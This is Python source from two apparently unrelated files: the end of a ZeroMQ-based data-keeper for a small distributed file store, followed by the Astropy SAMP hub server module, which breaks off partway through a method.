        socket.connect(masterport + self.i_Am_Alive_port)
        while True:
            # Our address is the endpoint prefix without the trailing ':'.
            messagedata = connectionPort[:-1]
            socket.send_string(messagedata)
            time.sleep(.5)

    def UploadFile(self, message):
        """Write the file payload carried in `message` to local disk.

        Returns True on completion.
        """
        name = message['fileName']
        # BUG FIX: the original printed a literal "/n" instead of a newline.
        print(name + "\n")
        file = message['File']
        # BUG FIX: context manager guarantees the file is closed even if
        # write() raises (the original closed it manually).
        with open(name, 'wb') as f:
            f.write(file)
        print("datakeeper:video %s added on machine no %d successfully ^_^ \n"
              % (name, self.ID))
        return True

    def DownloadFile(self, message, socket):
        """Read the requested file from disk, attach it to `message` and send
        it back on `socket`.

        Returns True on completion.
        """
        print("d5lt el download")
        fileName = message['fileName']
        # BUG FIX: context manager closes the file even if send fails.
        with open(fileName, "rb") as f:
            message['File'] = f.read()
        socket.send_pyobj(message)
        print("video downloaded 😊 \n")
        return True

    def ConnectToClient(self):
        """Serve upload (Type == 1) and download requests from a client,
        reporting each success to the master on the success port."""
        socket = self.context.socket(zmq.PAIR)
        socket.bind(connectionPort + self.clientport)
        mastersocket = self.context.socket(zmq.PUSH)
        mastersocket.bind(connectionPort + self.mastersuccessport)
        while True:
            message = socket.recv_pyobj()
            print("keeper received from client \n")
            Type = message['Type']
            clientSuccessPort = message['successport']
            if Type == 1:
                success = self.UploadFile(message)
            else:
                success = self.DownloadFile(message, socket)
            if success:
                msg = {'success': True, 'successPort': clientSuccessPort}
                mastersocket.send_pyobj(msg)
                print("success message sent to master")

    def SendReplica(self):
        """Handle a replication request from the master: push a local file
        to another keeper identified by its endpoint (`message['ip']`)."""
        master_socket = self.context.socket(zmq.PAIR)
        master_socket.bind(connectionPort + self.replicationPort)
        while True:
            message = master_socket.recv_pyobj()
            print("keeper received replica req from master ")
            print(message)
            ip = message['ip']
            # Reshape the request into an upload message for the target keeper.
            message['successport'] = ""
            message['Type'] = 1
            replica_socket = self.context.socket(zmq.PAIR)
            replica_socket.connect(ip)
            success = self.DownloadFile(message, replica_socket)
            if success:
                msg = {'success': True, 'successPort': ""}
                master_socket.send_pyobj(msg)
            replica_socket.close()


if __name__ == '__main__':
    # BUG FIX: guard process creation with __main__. Without it the module
    # re-spawns processes when imported (and breaks on spawn-based
    # multiprocessing platforms such as Windows/macOS).
    d1 = DataKeeper(1, "5510")
    d2 = DataKeeper(2, "5511")
    d3 = DataKeeper(3, "5512")

    p1 = Process(target=d1.ConnectToClient)
    p2 = Process(target=d2.ConnectToClient)
    p3 = Process(target=d3.ConnectToClient)
    h1 = Process(target=d1.HeartBeat)
    r1 = Process(target=d2.SendReplica)

    # starting processes
    h1.start()
    r1.start()
    p1.start()
    p2.start()
    p3.start()

    # joining processes
    h1.join()
    r1.join()
    p1.join()
    p2.join()
    p3.join()
hub.py
# Licensed under a 3-clause BSD style license - see LICENSE.rst

import copy
import os
import select
import socket
import threading
import time
import uuid
import warnings
import queue

import xmlrpc.client as xmlrpc
from urllib.parse import urlunparse

from astropy import log

from .constants import SAMP_STATUS_OK
from .constants import __profile_version__
from .errors import SAMPWarning, SAMPHubError, SAMPProxyError
from .utils import internet_on, ServerProxyPool, _HubAsClient
from .lockfile_helpers import read_lockfile, create_lock_file

from .standard_profile import ThreadingXMLRPCServer
from .web_profile import WebProfileXMLRPCServer, web_profile_text_dialog

__all__ = ['SAMPHubServer', 'WebProfileDialog']

__doctest_skip__ = ['.', 'SAMPHubServer.*']


class SAMPHubServer:
    """
    SAMP Hub Server.

    Parameters
    ----------
    secret : str, optional
        The secret code to use for the SAMP lockfile. If none is
        specified, the :func:`uuid.uuid1` function is used to generate one.

    addr : str, optional
        Listening address (or IP). This defaults to 127.0.0.1 if the
        internet is not reachable, otherwise it defaults to the host name.

    port : int, optional
        Listening XML-RPC server socket port. If left set to 0 (the
        default), the operating system will select a free port.

    lockfile : str, optional
        Custom lockfile name.

    timeout : int, optional
        Hub inactivity timeout. If ``timeout > 0`` then the Hub
        automatically stops after an inactivity period longer than
        ``timeout`` seconds. By default ``timeout`` is set to 0 (Hub never
        expires).

    client_timeout : int, optional
        Client inactivity timeout. If ``client_timeout > 0`` then the Hub
        automatically unregisters the clients which result inactive for a
        period longer than ``client_timeout`` seconds. By default
        ``client_timeout`` is set to 0 (clients never expire).

    mode : str, optional
        Defines the Hub running mode. If ``mode`` is ``'single'`` then the
        Hub runs using the standard ``.samp`` lock-file, having a single
        instance for user desktop session. Otherwise, if ``mode`` is
        ``'multiple'``, then the Hub runs using a non-standard lock-file,
        placed in ``.samp-1`` directory, of the form ``samp-hub-<UUID>``,
        where ``<UUID>`` is a unique UUID assigned to the hub.

    label : str, optional
        A string used to label the Hub with a human readable name. This
        string is written in the lock-file assigned to the ``hub.label``
        token.

    web_profile : bool, optional
        Enables or disables the Web Profile support.

    web_profile_dialog : class, optional
        Allows a class instance to be specified using ``web_profile_dialog``
        to replace the terminal-based message with e.g. a GUI pop-up. Two
        `queue.Queue` instances will be added to the instance as attributes
        ``queue_request`` and ``queue_result``. When a request is received
        via the ``queue_request`` queue, the pop-up should be displayed, and
        a value of `True` or `False` should be added to ``queue_result``
        depending on whether the user accepted or refused the connection.

    web_port : int, optional
        The port to use for web SAMP. This should not be changed except for
        testing purposes, since web SAMP should always use port 21012.

    pool_size : int, optional
        The number of socket connections opened to communicate with the
        clients.
    """

    def __init__(self, secret=None, addr=None, port=0, lockfile=None,
                 timeout=0, client_timeout=0, mode='single', label="",
                 web_profile=True, web_profile_dialog=None, web_port=21012,
                 pool_size=20):

        # Generate random ID for the hub
        self._id = str(uuid.uuid1())

        # General settings
        self._is_running = False
        self._customlockfilename = lockfile
        self._lockfile = None
        self._addr = addr
        self._port = port
        self._mode = mode
        self._label = label
        self._timeout = timeout
        self._client_timeout = client_timeout
        self._pool_size = pool_size

        # Web profile specific attributes
        self._web_profile = web_profile
        self._web_profile_dialog = web_profile_dialog
        self._web_port = web_port

        self._web_profile_server = None
        self._web_profile_callbacks = {}
        self._web_profile_requests_queue = None
        self._web_profile_requests_result = None
        self._web_profile_requests_semaphore = None

        # Fall back to the loopback address when the FQDN cannot be resolved.
        self._host_name = "127.0.0.1"
        if internet_on():
            try:
                self._host_name = socket.getfqdn()
                socket.getaddrinfo(self._addr or self._host_name,
                                   self._port or 0)
            except socket.error:
                self._host_name = "127.0.0.1"

        # Threading stuff
        self._thread_lock = threading.Lock()
        self._thread_run = None
        self._thread_hub_timeout = None
        self._thread_client_timeout = None

        self._launched_threads = []

        # Variables for timeout testing:
        self._last_activity_time = None
        self._client_activity_time = {}

        # Hub message id counter, used to create hub msg ids
        self._hub_msg_id_counter = 0

        # Hub secret code
        self._hub_secret_code_customized = secret
        self._hub_secret = self._create_secret_code()

        # Hub public id (as SAMP client)
        self._hub_public_id = ""

        # Client ids
        # {private_key: (public_id, timestamp)}
        self._private_keys = {}

        # Metadata per client
        # {private_key: metadata}
        self._metadata = {}

        # List of subscribed clients per MType
        # {mtype: private_key list}
        self._mtype2ids = {}

        # List of subscribed MTypes per client
        # {private_key: mtype list}
        self._id2mtypes = {}

        # List of XML-RPC addresses per client
        # {public_id: (XML-RPC address, ServerProxyPool instance)}
        self._xmlrpc_endpoints = {}

        # Synchronous message id heap
        self._sync_msg_ids_heap = {}

        # Public ids counter
        self._client_id_counter = -1

    @property
    def id(self):
        """
        The unique hub ID.
        """
        return self._id

    def _register_standard_api(self, server):
        """Register the Standard Profile XML-RPC methods on ``server``."""
        # Standard Profile only operations
        server.register_function(self._ping, 'samp.hub.ping')
        server.register_function(self._set_xmlrpc_callback,
                                 'samp.hub.setXmlrpcCallback')

        # Standard API operations
        server.register_function(self._register, 'samp.hub.register')
        server.register_function(self._unregister, 'samp.hub.unregister')
        server.register_function(self._declare_metadata,
                                 'samp.hub.declareMetadata')
        server.register_function(self._get_metadata, 'samp.hub.getMetadata')
        server.register_function(self._declare_subscriptions,
                                 'samp.hub.declareSubscriptions')
        server.register_function(self._get_subscriptions,
                                 'samp.hub.getSubscriptions')
        server.register_function(self._get_registered_clients,
                                 'samp.hub.getRegisteredClients')
        server.register_function(self._get_subscribed_clients,
                                 'samp.hub.getSubscribedClients')
        server.register_function(self._notify, 'samp.hub.notify')
        server.register_function(self._notify_all, 'samp.hub.notifyAll')
        server.register_function(self._call, 'samp.hub.call')
        server.register_function(self._call_all, 'samp.hub.callAll')
        server.register_function(self._call_and_wait, 'samp.hub.callAndWait')
        server.register_function(self._reply, 'samp.hub.reply')

    def _register_web_profile_api(self, server):
        """Register the Web Profile XML-RPC methods on ``server``."""
        # Web Profile methods like Standard Profile
        server.register_function(self._ping, 'samp.webhub.ping')
        server.register_function(self._unregister, 'samp.webhub.unregister')
        server.register_function(self._declare_metadata,
                                 'samp.webhub.declareMetadata')
        server.register_function(self._get_metadata,
                                 'samp.webhub.getMetadata')
        server.register_function(self._declare_subscriptions,
                                 'samp.webhub.declareSubscriptions')
        server.register_function(self._get_subscriptions,
                                 'samp.webhub.getSubscriptions')
        server.register_function(self._get_registered_clients,
                                 'samp.webhub.getRegisteredClients')
        server.register_function(self._get_subscribed_clients,
                                 'samp.webhub.getSubscribedClients')
        server.register_function(self._notify, 'samp.webhub.notify')
        server.register_function(self._notify_all, 'samp.webhub.notifyAll')
        server.register_function(self._call, 'samp.webhub.call')
        server.register_function(self._call_all, 'samp.webhub.callAll')
        server.register_function(self._call_and_wait,
                                 'samp.webhub.callAndWait')
        server.register_function(self._reply, 'samp.webhub.reply')

        # Methods particularly for Web Profile
        server.register_function(self._web_profile_register,
                                 'samp.webhub.register')
        server.register_function(self._web_profile_allowReverseCallbacks,
                                 'samp.webhub.allowReverseCallbacks')
        server.register_function(self._web_profile_pullCallbacks,
                                 'samp.webhub.pullCallbacks')

    def _start_standard_server(self):
        """Create the Standard Profile XML-RPC server and record its URL."""
        self._server = ThreadingXMLRPCServer(
            (self._addr or self._host_name, self._port or 0), log,
            logRequests=False, allow_none=True)
        prot = 'http'

        # Resolve the OS-assigned port when 0 was requested.
        self._port = self._server.socket.getsockname()[1]
        addr = "{0}:{1}".format(self._addr or self._host_name, self._port)
        self._url = urlunparse((prot, addr, '', '', '', ''))
        self._server.register_introspection_functions()
        self._register_standard_api(self._server)

    def _start_web_profile_server(self):
        """Create the Web Profile XML-RPC server; disable Web Profile support
        if the web port is already in use."""
        self._web_profile_requests_queue = queue.Queue(1)
        self._web_profile_requests_result = queue.Queue(1)
        self._web_profile_requests_semaphore = queue.Queue(1)

        if self._web_profile_dialog is not None:
            # TODO: Some sort of duck-typing on the web_profile_dialog object
            self._web_profile_dialog.queue_request = \
                self._web_profile_requests_queue
            self._web_profile_dialog.queue_result = \
                self._web_profile_requests_result

        try:
            self._web_profile_server = WebProfileXMLRPCServer(
                ('localhost', self._web_port), log, logRequests=False,
                allow_none=True)
            self._web_port = self._web_profile_server.socket.getsockname()[1]
            self._web_profile_server.register_introspection_functions()
            self._register_web_profile_api(self._web_profile_server)
            log.info("Hub set to run with Web Profile support enabled.")
        except socket.error:
            # NOTE(review): the second positional argument (SAMPWarning) is
            # passed to log.warning here — confirm the `log` object accepts a
            # warning category; stdlib logging would treat it as a format arg.
            log.warning("Port {0} already in use. Impossible to run the "
                        "Hub with Web Profile support.".format(self._web_port),
                        SAMPWarning)
            self._web_profile = False
            # Cleanup
            self._web_profile_requests_queue = None
            self._web_profile_requests_result = None
            self._web_profile_requests_semaphore = None

    def _launch_thread(self, group=None, target=None, name=None, args=None):
        """Start a tracked thread, pruning finished ones from the registry."""
        # Remove inactive threads
        remove = []
        for t in self._launched_threads:
            if not t.is_alive():
                remove.append(t)
        for t in remove:
            self._launched_threads.remove(t)

        # Start new thread
        t = threading.Thread(group=group, target=target, name=name, args=args)
        t.start()

        # Add to list of launched threads
        self._launched_threads.append(t)

    def _join_launched_threads(self, timeout=None):
        """Join every tracked thread, each with the given timeout."""
        for t in self._launched_threads:
            t.join(timeout=timeout)

    def _timeout_test_hub(self):
        """Watchdog loop: stop the hub after ``timeout`` seconds of inactivity."""
        if self._timeout == 0:
            return

        last = time.time()
        while self._is_running:
            time.sleep(0.05)  # keep this small to check _is_running often
            now = time.time()
            if now - last > 1.:
                with self._thread_lock:
                    if self._last_activity_time is not None:
                        if now - self._last_activity_time >= self._timeout:
                            warnings.warn("Timeout expired, Hub is shutting down!",
                                          SAMPWarning)
                            self.stop()
                            return
                last = now

    def _timeout_test_client(self):
        """Watchdog loop: unregister clients inactive longer than
        ``client_timeout`` seconds (the hub's own client is exempt)."""
        if self._client_timeout == 0:
            return

        last = time.time()
        while self._is_running:
            time.sleep(0.05)  # keep this small to check _is_running often
            now = time.time()
            if now - last > 1.:
                # NOTE(review): _unregister mutates _client_activity_time
                # while this iterates its keys — confirm a snapshot
                # (list(...)) is not needed here.
                for private_key in self._client_activity_time.keys():
                    if (now - self._client_activity_time[private_key] >
                            self._client_timeout and
                            private_key != self._hub_private_key):
                        warnings.warn(
                            "Client {} timeout expired!".format(private_key),
                            SAMPWarning)
                        self._notify_disconnection(private_key)
                        self._unregister(private_key)
                last = now

    def _hub_as_client_request_handler(self, method, args):
        """Dispatch an XML-RPC-style call addressed to the hub's own
        internal client."""
        if method == 'samp.client.receiveCall':
            return self._receive_call(*args)
        elif method == 'samp.client.receiveNotification':
            return self._receive_notification(*args)
        elif method == 'samp.client.receiveResponse':
            return self._receive_response(*args)
        elif method == 'samp.app.ping':
            return self._ping(*args)

    def _setup_hub_as_client(self):
        """Register the hub itself as a SAMP client and declare its
        metadata and subscriptions."""
        hub_metadata = {"samp.name": "Astropy SAMP Hub",
                        "samp.description.text": self._label,
                        "author.name": "The Astropy Collaboration",
                        "samp.documentation.url":
                            "http://docs.astropy.org/en/stable/samp",
                        "samp.icon.url": self._url + "/samp/icon"}

        result = self._register(self._hub_secret)
        self._hub_public_id = result["samp.self-id"]
        self._hub_private_key = result["samp.private-key"]
        self._set_xmlrpc_callback(self._hub_private_key, self._url)
        self._declare_metadata(self._hub_private_key, hub_metadata)
        self._declare_subscriptions(self._hub_private_key,
                                    {"samp.app.ping": {},
                                     "x-samp.query.by-meta": {}})

    def start(self, wait=False):
        """
        Start the current SAMP Hub instance and create the lock file. Hub
        start-up can be blocking or non blocking depending on the ``wait``
        parameter.

        Parameters
        ----------
        wait : bool
            If `True` then the Hub process is joined with the caller,
            blocking the code flow. Usually `True` option is used to run a
            stand-alone Hub in an executable script. If `False` (default),
            then the Hub process runs in a separated thread. `False` is
            usually used in a Python shell.
        """
        if self._is_running:
            raise SAMPHubError("Hub is already running")

        if self._lockfile is not None:
            raise SAMPHubError("Hub is not running but lockfile is set")

        if self._web_profile:
            self._start_web_profile_server()

        self._start_standard_server()

        self._lockfile = create_lock_file(lockfilename=self._customlockfilename,
                                          mode=self._mode, hub_id=self.id,
                                          hub_params=self.params)

        self._update_last_activity_time()
        self._setup_hub_as_client()
        self._start_threads()

        log.info("Hub started")

        if wait and self._is_running:
            self._thread_run.join()
            self._thread_run = None

    @property
    def params(self):
        """
        The hub parameters (which are written to the logfile)
        """
        params = {}

        # Keys required by standard profile
        params['samp.secret'] = self._hub_secret
        params['samp.hub.xmlrpc.url'] = self._url
        params['samp.profile.version'] = __profile_version__

        # Custom keys
        params['hub.id'] = self.id
        params['hub.label'] = self._label or "Hub {0}".format(self.id)

        return params

    def _start_threads(self):
        """Start the serve loop and the (optional) hub/client timeout
        watchdog threads; mark the hub as running."""
        self._thread_run = threading.Thread(target=self._serve_forever)
        self._thread_run.daemon = True

        if self._timeout > 0:
            self._thread_hub_timeout = threading.Thread(
                target=self._timeout_test_hub,
                name="Hub timeout test")
            self._thread_hub_timeout.daemon = True
        else:
            self._thread_hub_timeout = None

        if self._client_timeout > 0:
            self._thread_client_timeout = threading.Thread(
                target=self._timeout_test_client,
                name="Client timeout test")
            self._thread_client_timeout.daemon = True
        else:
            self._thread_client_timeout = None

        self._is_running = True
        self._thread_run.start()

        if self._thread_hub_timeout is not None:
            self._thread_hub_timeout.start()
        if self._thread_client_timeout is not None:
            self._thread_client_timeout.start()

    def _create_secret_code(self):
        """Return the user-provided secret, or a fresh UUID-based one."""
        if self._hub_secret_code_customized is not None:
            return self._hub_secret_code_customized
        else:
            return str(uuid.uuid1())

    def stop(self):
        """
        Stop the current SAMP Hub instance and delete the lock file.
        """
        if not self._is_running:
            return

        log.info("Hub is stopping...")

        self._notify_shutdown()

        self._is_running = False

        # Remove the lockfile only if it still belongs to this hub instance.
        if self._lockfile and os.path.isfile(self._lockfile):
            lockfiledict = read_lockfile(self._lockfile)
            if lockfiledict['samp.secret'] == self._hub_secret:
                os.remove(self._lockfile)
        self._lockfile = None

        # Reset variables
        # TODO: What happens if not all threads are stopped after timeout?
        self._join_all_threads(timeout=10.)

        self._hub_msg_id_counter = 0
        self._hub_secret = self._create_secret_code()
        self._hub_public_id = ""
        self._metadata = {}
        self._private_keys = {}
        self._mtype2ids = {}
        self._id2mtypes = {}
        self._xmlrpc_endpoints = {}
        self._last_activity_time = None

        log.info("Hub stopped.")

    def _join_all_threads(self, timeout=None):
        """Join the serve/timeout threads and all launched threads, taking
        care not to join the thread ``stop`` is running on."""
        # In some cases, ``stop`` may be called from some of the sub-threads,
        # so we just need to make sure that we don't try and shut down the
        # calling thread.
        current_thread = threading.current_thread()
        if self._thread_run is not current_thread:
            self._thread_run.join(timeout=timeout)
            if not self._thread_run.is_alive():
                self._thread_run = None
        if self._thread_hub_timeout is not None and self._thread_hub_timeout is not current_thread:
            self._thread_hub_timeout.join(timeout=timeout)
            if not self._thread_hub_timeout.is_alive():
                self._thread_hub_timeout = None
        if self._thread_client_timeout is not None and self._thread_client_timeout is not current_thread:
            self._thread_client_timeout.join(timeout=timeout)
            if not self._thread_client_timeout.is_alive():
                self._thread_client_timeout = None

        self._join_launched_threads(timeout=timeout)

    @property
    def is_running(self):
        """Return an information concerning the Hub running status.

        Returns
        -------
        running : bool
            Is the hub running?
""" return self._is_running def _serve_forever(self): while self._is_running: try: read_ready = select.select([self._server.socket], [], [], 0.01)[0] except OSError as exc: warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc), SAMPWarning) else: if read_ready: self._server.handle_request() if self._web_profile: # We now check if there are any connection requests from the # web profile, and if so, we initialize the pop-up. if self._web_profile_dialog is None: try: request = self._web_profile_requests_queue.get_nowait() except queue.Empty: pass else: web_profile_text_dialog(request, self._web_profile_requests_result) # We now check for requests over the web profile socket, and we # also update the pop-up in case there are any changes. try: read_ready = select.select([self._web_profile_server.socket], [], [], 0.01)[0] except OSError as exc: warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc), SAMPWarning) else: if read_ready: self._web_profile_server.handle_request() self._server.server_close() if self._web_profile_server is not None: self._web_profile_server.server_close() def _notify_shutdown(self): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.shutdown") for mtype in msubs: if mtype in self._mtype2ids: for key in self._mtype2ids[mtype]: self._notify_(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.shutdown", "samp.params": {}}) def _notify_register(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.register") for mtype in msubs: if mtype in self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: # if key != private_key: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.register", "samp.params": {"id": public_id}}) def _notify_unregister(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.unregister") for mtype in msubs: if mtype in 
self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: if key != private_key: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.unregister", "samp.params": {"id": public_id}}) def _notify_metadata(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.metadata") for mtype in msubs: if mtype in self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: # if key != private_key: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.metadata", "samp.params": {"id": public_id, "metadata": self._metadata[private_key]} }) def _notify_subscriptions(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.subscriptions") for mtype in msubs: if mtype in self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.subscriptions", "samp.params": {"id": public_id, "subscriptions": self._id2mtypes[private_key]} }) def _notify_disconnection(self, private_key): def _xmlrpc_call_disconnect(endpoint, private_key, hub_public_id, message): endpoint.samp.client.receiveNotification(private_key, hub_public_id, message) msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.disconnect") public_id = self._private_keys[private_key][0] endpoint = self._xmlrpc_endpoints[public_id][1] for mtype in msubs: if mtype in self._mtype2ids and private_key in self._mtype2ids[mtype]: log.debug("notify disconnection to {}".format(public_id)) self._launch_thread(target=_xmlrpc_call_disconnect, args=(endpoint, private_key, self._hub_public_id, {"samp.mtype": "samp.hub.disconnect", "samp.params": {"reason": "Timeout expired!"}})) def _ping(self): self._update_last_activity_time() log.debug("ping") return "1" def _query_by_metadata(self, key, value): public_id_list = [] for 
private_id in self._metadata: if key in self._metadata[private_id]: if self._metadata[private_id][key] == value: public_id_list.append(self._private_keys[private_id][0]) return public_id_list def _set_xmlrpc_callback(self, private_key, xmlrpc_addr): self._update_last_activity_time(private_key) if private_key in self._private_keys: if private_key == self._hub_private_key: public_id = self._private_keys[private_key][0] self._xmlrpc_endpoints[public_id] = \ (xmlrpc_addr, _HubAsClient(self._hub_as_client_request_handler)) return "" # Dictionary stored with the public id log.debug("set_xmlrpc_callback: {} {}".format(private_key, xmlrpc_addr)) server_proxy_pool = None server_proxy_pool = ServerProxyPool(self._pool_size, xmlrpc.ServerProxy, xmlrpc_addr, allow_none=1) public_id = self._private_keys[private_key][0] self._xmlrpc_endpoints[public_id] = (xmlrpc_addr, server_proxy_pool) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return "" def _perform_standard_register(self): with self._thread_lock: private_key, public_id = self._get_new_ids() self._private_keys[private_key] = (public_id, time.time()) self._update_last_activity_time(private_key) self._notify_register(private_key) log.debug("register: private-key = {} and self-id = {}" .format(private_key, public_id)) return {"samp.self-id": public_id, "samp.private-key": private_key, "samp.hub-id": self._hub_public_id} def _register(self, secret): self._update_last_activity_time() if secret == self._hub_secret: return self._perform_standard_register() else: # return {"samp.self-id": "", "samp.private-key": "", "samp.hub-id": ""} raise SAMPProxyError(7, "Bad secret code") def _get_new_ids(self): private_key = str(uuid.uuid1()) self._client_id_counter += 1 public_id = 'cli#hub' if self._client_id_counter > 0: public_id = "cli#{}".format(self._client_id_counter) return private_key, public_id def _unregister(self, private_key): self._update_last_activity_time() public_key = "" 
self._notify_unregister(private_key) with self._thread_lock: if private_key in self._private_keys: public_key = self._private_keys[private_key][0] del self._private_keys[private_key] else: return "" if private_key in self._metadata: del self._metadata[private_key] if private_key in self._id2mtypes: del self._id2mtypes[private_key] for mtype in self._mtype2ids.keys(): if private_key in self._mtype2ids[mtype]: self._mtype2ids[mtype].remove(private_key) if public_key in self._xmlrpc_endpoints: del self._xmlrpc_endpoints[public_key] if private_key in self._client_activity_time: del self._client_activity_time[private_key] if self._web_profile: if private_key in self._web_profile_callbacks: del self._web_profile_callbacks[private_key] self._web_profile_server.remove_client(private_key) log.debug("unregister {} ({})".format(public_key, private_key)) return "" def _declare_metadata(self, private_key, metadata): self._update_last_activity_time(private_key) if private_key in self._private_keys: log.debug("declare_metadata: private-key = {} metadata = {}" .format(private_key, str(metadata))) self._metadata[private_key] = metadata self._notify_metadata(private_key) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return "" def _get_metadata(self, private_key, client_id): self._update_last_activity_time(private_key) if private_key in self._private_keys: client_private_key = self._public_id_to_private_key(client_id) log.debug("get_metadata: private-key = {} client-id = {}" .format(private_key, client_id)) if client_private_key is not None: if client_private_key in self._metadata: log.debug("--> metadata = {}" .format(self._metadata[client_private_key])) return self._metadata[client_private_key] else: return {} else: raise SAMPProxyError(6, "Invalid client ID") else: raise SAMPProxyError(5, "Private-key {} expired or invalid." 
.format(private_key)) def _declare_subscriptions(self, private_key, mtypes): self._update_last_activity_time(private_key) if private_key in self._private_keys: log.debug("declare_subscriptions: private-key = {} mtypes = {}" .format(private_key, str(mtypes))) # remove subscription to previous mtypes if private_key in self._id2mtypes: prev_mtypes = self._id2mtypes[private_key] for mtype in prev_mtypes: try: self._mtype2ids[mtype].remove(private_key) except ValueError: # private_key is not in list pass self._id2mtypes[private_key] = copy.deepcopy(mtypes) # remove duplicated MType for wildcard overwriting original_mtypes = copy.deepcopy(mtypes) for mtype in original_mtypes: if mtype.endswith("*"): for mtype2 in original_mtypes: if mtype2.startswith(mtype[:-1]) and \ mtype2 != mtype: if mtype2 in mtypes: del(mtypes[mtype2]) log.debug("declare_subscriptions: subscriptions accepted from " "{} => {}".format(private_key, str(mtypes))) for mtype in mtypes: if mtype in self._mtype2ids: if private_key not in self._mtype2ids[mtype]: self._mtype2ids[mtype].append(private_key) else: self._mtype2ids[mtype] = [private_key] self._notify_subscriptions(private_key) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return "" def _get_subscriptions(self, private_key, client_id): self._update_last_activity_time(private_key) if private_key in self._private_keys: client_private_key = self._public_id_to_private_key(client_id) if client_private_key is not None: if client_private_key in self._id2mtypes: log.debug("get_subscriptions: client-id = {} mtypes = {}" .format(client_id, str(self._id2mtypes[client_private_key]))) return self._id2mtypes[client_private_key] else: log.debug("get_subscriptions: client-id = {} mtypes = " "missing".format(client_id)) return {} else: raise SAMPProxyError(6, "Invalid client ID") else: raise SAMPProxyError(5, "Private-key {} expired or invalid." 
.format(private_key)) def _get_registered_clients(self, private_key): self._update_last_activity_time(private_key) if private_key in self._private_keys: reg_clients = [] for pkey in self._private_keys.keys(): if pkey != private_key: reg_clients.append(self._private_keys[pkey][0]) log.debug("get_registered_clients: private_key = {} clients = {}" .format(private_key, reg_clients)) return reg_clients else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _get_subscribed_clients(self, private_key, mtype): self._update_last_activity_time(private_key) if private_key in self._private_keys: sub_clients = {} for pkey in self._private_keys.keys(): if pkey != private_key and self._is_subscribed(pkey, mtype): sub_clients[self._private_keys[pkey][0]] = {} log.debug("get_subscribed_clients: private_key = {} mtype = {} " "clients = {}".format(private_key, mtype, sub_clients)) return sub_clients else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) @staticmethod def get_mtype_subtypes(mtype): """ Return a list containing all the possible wildcarded subtypes of MType. Parameters ---------- mtype : str MType to be parsed. 
Returns ------- types : list List of subtypes Examples -------- >>> from astropy.samp import SAMPHubServer >>> SAMPHubServer.get_mtype_subtypes("samp.app.ping") ['samp.app.ping', 'samp.app.*', 'samp.*', '*'] """ subtypes = [] msubs = mtype.split(".") indexes = list(range(len(msubs))) indexes.reverse() indexes.append(-1) for i in indexes: tmp_mtype = ".".join(msubs[:i + 1]) if tmp_mtype != mtype: if tmp_mtype != "": tmp_mtype = tmp_mtype + ".*" else: tmp_mtype = "*" subtypes.append(tmp_mtype) return subtypes def _is_subscribed(self, private_key, mtype): subscribed = False msubs = SAMPHubServer.get_mtype_subtypes(mtype) for msub in msubs: if msub in self._mtype2ids: if private_key in self._mtype2ids[msub]: subscribed = True return subscribed def _notify(self, private_key, recipient_id, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if self._is_subscribed(self._public_id_to_private_key(recipient_id), message["samp.mtype"]) is False: raise SAMPProxyError(2, "Client {} not subscribed to MType {}" .format(recipient_id, message["samp.mtype"])) self._launch_thread(target=self._notify_, args=(private_key, recipient_id, message)) return {} else: raise SAMPProxyError(5, "Private-key {} expired or invalid." 
.format(private_key)) def _notify_(self, sender_private_key, recipient_public_id, message): if sender_private_key not in self._private_keys: return sender_public_id = self._private_keys[sender_private_key][0] try: log.debug("notify {} from {} to {}".format( message["samp.mtype"], sender_public_id, recipient_public_id)) recipient_private_key = self._public_id_to_private_key(recipient_public_id) arg_params = (sender_public_id, message) samp_method_name = "receiveNotification" self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params) except Exception as exc: warnings.warn("{} notification from client {} to client {} " "failed [{}]".format(message["samp.mtype"], sender_public_id, recipient_public_id, exc), SAMPWarning) def _notify_all(self, private_key, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if "samp.mtype" not in message: raise SAMPProxyError(3, "samp.mtype keyword is missing") recipient_ids = self._notify_all_(private_key, message) return recipient_ids else: raise SAMPProxyError(5, "Private-key {} expired or invalid." 
.format(private_key)) def _notify_all_(self, sender_private_key, message): recipient_ids = [] msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"]) for mtype in msubs: if mtype in self._mtype2ids: for key in self._mtype2ids[mtype]: if key != sender_private_key: _recipient_id = self._private_keys[key][0] recipient_ids.append(_recipient_id) self._launch_thread(target=self._notify, args=(sender_private_key, _recipient_id, message) ) return recipient_ids def _call(self, private_key, recipient_id, msg_tag, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if self._is_subscribed(self._public_id_to_private_key(recipient_id), message["samp.mtype"]) is False: raise SAMPProxyError(2, "Client {} not subscribed to MType {}" .format(recipient_id, message["samp.mtype"])) public_id = self._private_keys[private_key][0] msg_id = self._get_new_hub_msg_id(public_id, msg_tag) self._launch_thread(target=self._call_, args=(private_key, public_id, recipient_id, msg_id, message)) return msg_id else: raise SAMPProxyError(5, "Private-key {} expired or invalid." 
